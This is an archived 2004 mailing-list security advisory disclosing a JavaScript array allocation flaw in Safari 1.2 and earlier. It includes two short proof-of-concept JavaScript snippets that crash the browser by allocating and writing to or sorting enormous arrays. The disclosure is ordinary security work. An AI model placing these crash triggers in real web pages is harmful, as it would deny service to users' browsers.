[<prev] [next>] [day] [month] [year] [list]
Message-ID: <404A4566.7050508@insecure.ws>
From: kang at insecure.ws (kang)
Subject: Safari javascript array overflow
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
http://www.insecure.ws/article.php?story=2004021918172533
A problem exists in the way Safari Javascript engine allocates Arrays.
For example, allocating a too big array and writing into it, will
segfault Safari. There is no known way to execute remote code with this
vulnerability as the date of this advisory.
Konqueror doesn't seems to be vulnerable.
- --
Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari =< 1.2
Impact: Denial of Service, Possibly exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang@...ecure.ws
Simple allocation management error trigger:
~ var a = new Array(99999999999999999999999);
~ a[0+5]="AAAAA";
Another possibilty...;)
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));
There are some other possibilities :>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFASkVmxt5Ja4aWvZMRAtG7AKCOz+licSBi/NpYe4qNu4YX468mCACdF4LA
DOrzcVourknKaBqvWFAlaQI=
=VISk
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists